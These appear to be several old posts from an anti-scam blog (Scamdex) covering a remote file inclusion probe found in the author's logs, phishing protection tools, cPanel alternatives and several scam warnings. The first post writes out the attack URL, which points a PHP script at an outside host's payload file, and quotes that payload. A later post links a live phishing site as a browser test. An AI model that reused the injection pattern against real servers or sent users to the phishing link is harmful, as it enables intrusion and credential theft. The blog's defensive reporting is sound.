There are a lot of smart people out there who know way too much about computers and software and stuff, like this guy: ‘Perishable Press‘. So, can someone clever please tell me why this simple url hangs up a bunch of seemingly dissimilar web servers:
http://www.microsoft.com/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt?
My banana was once part of a bunch very similar to this one
Here’s the deal – when someone asks for a webpage on Scamdex that doesn’t exist, it shoots me a quick email to tell me about it. That way I can see if anything is broken and if anyone is trying to hack my site. My normal response to obviousl hack-attempts is to block the IP address or use .htaccess rewrite rules to send them to an oh-so-friendly ‘go away page‘ 
.
In this case, the URL carries a payload that is itself a link to a file on a remote site, which it hopes I will allow to run on my server. The code (which is reproduced in it’s entirety here) will, if allowed to run, return the word ‘FeelCoMz’ to the ’sKriptKiDee’, aka ‘Wanker’ on the sending end.
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>So… it didn’t work, I trapped it and it raised a red flag, but then why, when I try the URL does it make a browser stand blinking like a deer in the proverbial headlights for 120 seconds before falling flat on it’s back?
Analyzing the url gets me to this reduction of required parts:
* any .php file path.
* any query string, that contains a ‘http://’ in
* must have a file extension such as txt, gif, png etc.
* must have the trailing ‘?’
will cause the same problem on an awful lot of famous name servers. For example, including mine: scamdex.com, uniplex.com, google.com, microsoft.com, amazon.com etc etc.
For example, in the following link, everything except ‘www.amazon.com’ is made up
http://www.amazon.com/a.php?b=http://c.gif?
but it still exhibits the same behaviour – WTF is going on?
and why, oh why can’t I detect it in my .htaccess file?
First person to:
1. Tell me why it’s happening.
2. Tell me how to detect it and stop it happening.
3. Tell me why Google hates me.
gets a really major serious prize like my personal desktop banana, or this lovely (chipped) coffee mug with the name of a football club I don’t support on it – or even my second best earphones.
Good luck!
_________________________________
Still no replies and it’s still happening…. where have all the gurus gone?
In my infrequent callouts to other websites that (like Scamdex) were created out of the blind fury experinced by seeing bad people taking money from good people, I have another site for you to take notice of.
But first, a recap:
When Scamdex started in 2004, there were very few sites about scams and Internet fraud; we felt there was a need to educate people and, using the power of Search Engines, set out to make it easy to check on emails and websites.
Since then, the field has grown – lots of Government-funded sites have sprung up, large Internet organizations have (finally) acknowledged that fraud does happen and now devote precious pages to warning their customers “it’s not our fault, please don’t bother trying to sue us” “there are unscrupulous people out there so please don’t use Western Union to but Laptops from Nigeria” etc…
But still Scamdex and the many other privately run websites continue in their (often one-manned) struggle against the odds and so to one of these: ‘BobBear’
Bob Bear Website Logo
Bobbear.co.uk is a voluntary, non-profit site dedicated to providing information on fake companies offering part-time, work from home job scams, in particular money mule or money transfer fraud, aka ‘payment transfer agent’ scams and the related reshipping fraud or ‘parcels agent’ scams. They also provide victim advice and support. If you receive a suspect spam offering you a job or find a website offering fraud jobs then please send them (and us) a copy.
Please support them – you know it makes sense!
I am an old Unix dude, I have installed more different versions of Unix than most people – Everything from Sco Xenix/286 thru to Centos5.2 and I don’t usually have much problems – but as time wears on, my brainDisk is starting to squeal and it’s not as fast at random access as it used to be so I was really happy when I rented a server with Cpanel/WHM installed on it.
For those who don’t know, Cpanel is the web-based interface to everything you will never learn on a Unix server – plus, the WHM super system allows you to carve off a chunk and sell it or give it away to your pals, reasonably confident that they won’t/can’t screw it up.
Add in virtual web/mail/log server management and lots of useful pre-installed tools and you have a system where you rarely have to get your hands dirty under the #hood.
Well, I love Cpanel now and I have grown to rely on it (curses!) so when it comes to creating my own server, so I can save money on a dedicated one I find I need it to get things done (and my old stuff transferred.
The problem with CP is that it costs $$money. between $30 and $48/month. and. I. just. don’t. want. to. pay. that. any. more….. so….
Piracy is out – mainly because you need to register the license with CP and also because that’s bad!:’(
Perhaps I could install it, setup my system the way I want and then after a month or so, hand it back??
well, no apparently – most people (Including themselves) seem to be of the opinion that to uninstall CP, you should really re-install Linux…. kind of defeats my object here!
so…. alternatives, anyone?
There are a few – some other commercial (pay $$ for) such as DirectAdmin and some Public Domain ones (Web-CP, WebMin/VirtualMin). So I started evaluating these free Cpanel Alternatives ….
Looks like it will do the job – only one of the alts that I’ve heard of and actually used before. Installs easily enough and looks nice – has a fine range of functionality but what lets it down is it’s non-simplicity. Cpanel’s approach is to show you a bunch of things that you may want to do and asks sensible questions (with usually relevant tooltips close by) so help you accomplish your requirements. WebMin takes the ‘I’ll help you to write the configuration files correctly’ approach – you really have to know what you’re doing and in a lot of cases, the input fields are just blank with no clue as to what to put there.
WebMin Configuring Backup Example Screenshot
This probably highlights the major difference between CPanel/WHM and the rest of the Server Admin systems out there – CP/WHM does some pretty radical things to your server when you install it and this is why it’s so hard to uninstall. The other systems kind of leave things as they are and just act as configuration helpers. As an example, see the two screenshots of the ‘backup’ functions.
Cpanel Domain Owner Backup Page
Much, much, harder to install and harder to find the installation instructions too. but seems pretty good so far.
I had problems with the PHP startup scripts being written with DOS line endings which confused the life out of me for a while until I found it. Still not able to start the system up but suspect it’s something to do with the line that reads:
$args = trim(next($HTTP_SERVER_VARS["argv"]));
# Shouldn’t that just be ARGV for shell scripts?)
… I’ll continue and let you know how I get on.
Here are two really good reasons why you should use FireFox to surf the web instead of the ubiquitous Internet Explorer.
Firefox includes strict anti-phishing and anti-malware measures and it’s open source so it has thousands of security experts around the globe working around the clock to keep you (and your personal information) safe.
Firefox 3 protects you from viruses, worms, trojan horses and spyware. If you accidentally access an attack site, you’ll receive a full-sized browser message as a warning. A continuously updated list of attack-sites tells us when to stop you from browsing, so there’s nothing for you to update or maintain.
Anti Malware Warning in FireFox
Shop and do business safely on the Internet. Firefox gets a fresh update of web forgery sites 48 times in a day, so if you try to visit a fraudulent site that’s pretending to be a site you trust (like your bank), a browser message—big as life—will stop you.
Here’s the thing – from now on, ANY TIME you get an email that sends you to a PayPal/Bank of America/Google Adsense/eBay/your-bank-name site that you know is a scam site [that just wants your login/password/credit card/bank details] – immediately report it to PhishTank.com.
They are the database that many browsers and security firewalls automatically use – within seconds, millions of people are protected!. To see if YOUR browser/network is using this service, try this url picked at random from Phishtank’s database this morning – http://bloccatoinlinea.net/
I use Firefox mainly and for me, I get a nice message like this:
Firefox Warns about visiting a Phishing Site
If you get ’straight through’ without any warnings then you need to seriously consider upgrading your browser to FireFox 3 or even the spiffy new Google Chrome.
Is it worth the effort of reporting it?
Trust me , this isn’t the same as sending an email to abuse@hotwebsites-r-us.cn and hoping that something will happen – this is the real deal – Your submission goes into the Phishing database, people are invited to check your submission and vote on it (for or against) and (assuming it’s approved) one more scam website is defeated!
Once you’ve done it once, you might like to signup and join the band of selfless individuals who monitor, verify and discuss these things (look out for ’scamdex’!).
Good for your sense of moral outrage and good for the general public – help stamp out Phishing – go to Phishtank.com and sign up NOW!
The DNS Route to Scam Protection Online.
When you type in ‘www.scammingsite.com’ on your browser, a lookup is performed to translate the domain name into a unique address (IP Address) that all networked computers understand and which contains the path to the right server.
Your ISP will have given you two longish ‘numbers-separated-by-dots’ (eg. 207.44.123.28) to type in to your Network Settings. These are the Domain Name Servers (DNS) that your computer will use whenever you ask to go to a domain name.
Right? Well, never mind, just trust me on this one.
Wouldn’t it be great if, when you did the lookup/translate part, the result was filtered for Scams/Profanity/Pornography/Crime/Violence etc etc?
Well, by changing the DNS servers you use, you can have this great feature – for free, I may ad – and you (and your children/employees) can surf a little easier. No software to download, no subscriptions, no spam – it couldn’t be easier. Free, simple to do, free, great protection …. 
what more can I say other than if you don’t believe me, Click this button to find out why you need to change your DNS servers NOW!
(or, you can just change your DNS servers to 208.67.222.222 and 208.67.220.220 and get on with your life)
BTW, the same people who run OpenDNS.com also run an Anti-Phishing site called, amusingly, PhishTank
Why do I ask? Well, I got a spam/scam email today that pretends to be an alert from Microsoft, via the Secret Service that a backdoor has been found in Windows XP and that a patch has been released which will ‘fix’ this vulnerability.
Well, as you can imagine, the ‘patch‘ turns out to be a trojan/virus/worm thingy itself.
interestingly, this scammer uses imageshack.us to host his images. Here’s one:
The download site was WWW.WESTPAC-SITE.ORG which is hosted by one-and-one, a huge internet web hosting company and the rest of the details are probably spurious (Ian Arend from Victoria, Australia).
If you go to the westpac-site.org website, you find the beginnings of a Pharming operation, attempting to extract the PIN numbers of people’s credit cards for Bank of America accounts.
I have send emails to the relevant ISPs to try to get this site down as soon as possible, but people will get burned (unless that is, they see this posting first!)
When I get spam from a charity asking specifically for donations I visit the website just to see what kind of organization would use spam to solicit contributions. In most cases it’s a scam. Bona fide charities would NEVER spam you.
So this morning I received the following email
Stop! Help us, we are in need!
We are a non-governmental and non-profit association “Stop ajutane suntem in nevoie”. Taking into account that Romania has been confronted with numerous major problems such as floods, poor children and pensioneers who cannot afford expensive medicines. We want your support to build new dwellings for those who lost them because of the disasters and new homes for the children of the streets where they can be fed and taken good care of.
If you want to help us please visit our website by clicking www.stopandhelpus.org.
Copyright © 2007 Stop ajutane suntem in nevoie
www.stopandhelpus.org All Rights Reserved .
The website www.stopandhelpus.org is a cheesy template site with lots of links and badly written copy. Seems to be run out of Romania which always rings alarm bells.
I checked the domain name and, as I suspected, the domain name was registered on 19th June 2007 (Yesterday!) [ding ding]
The domain registrar (the person who owns the domain name) is hidden by a proxy [ding ding ding]
On a side note, these privacy proxies are all very well, but they are used by scammers to slow down investigations of scam websites. I think I’ll send a copy of this to contact@myprivateregistration.com and see if they do anything.
Anyway, if you hadnt gathered by now, at best ’stopandhelpus’ is a naive, slightly crummy new charity, staffed by good hearted but shady people or (as I think) they are an out and out scam.
W hatever you do, do not send any money to these scammers. I just hope that this post gets ‘out there’ soon enough so that anyone who searches for STOPANDHELPUS will find this page first.
contact@myprivateregistration.com
The US Internal Revenue Service (IRS) is warning of a new Internet scam based on a site masquerading as a member of the Free File Alliance. The site attempts to get taxpayers to file their information with them. The scammers then change the bank account details to their own and wait for the refund payments to arrive.
The IRS reminded taxpayers the only place to access the Free File program is through the official IRS.gov Web site.
“The final days of the tax season always bring tax scams,” IRS Commissioner Mark W. Everson said. “Make sure you’re really dealing with the IRS. Taxpayers can feel safe using Free File, but the only way to do it is through the secure IRS.gov Web site.”
The latest twist on tax scams involves tax preparation Web sites that inaccurately say they are part of the Free File Alliance, a partnership between 19 tax software companies and the IRS. The IRS is working with the Treasury Inspector General for Tax Administration to look into allegations that the Web sites accepted tax information from taxpayers, changed the taxpayers’ bank account numbers to their own and then filed the return through a legitimate Free File partner.
Taxpayers can avoid this problem by using the official Free File site on IRS.gov. Seventy percent of the nation’s taxpayers are eligible to use the free electronic filing system.
Firefox has many advantages over the competition, The main one being the toolbar add-in. The first one you should install is Google. The really really great thing about the Google toolbar is the builtin antip-phishing detection/protection system.
The way this works is as follows: You read an email (eg. Purportedly from PayPal) that tells you your account needs updating. You click on the link and are taken to a PayPal login page. Before you can say ‘Hey – Since when has Paypal used freescamwebsites.com for it’s website!’ an overlay: 
locks the whole webpage and a suitable warning comes up. (see image)
If you are in any way concerned about Phishing scams (I have been hit myself by a spoof eBay email), get Firefox now.
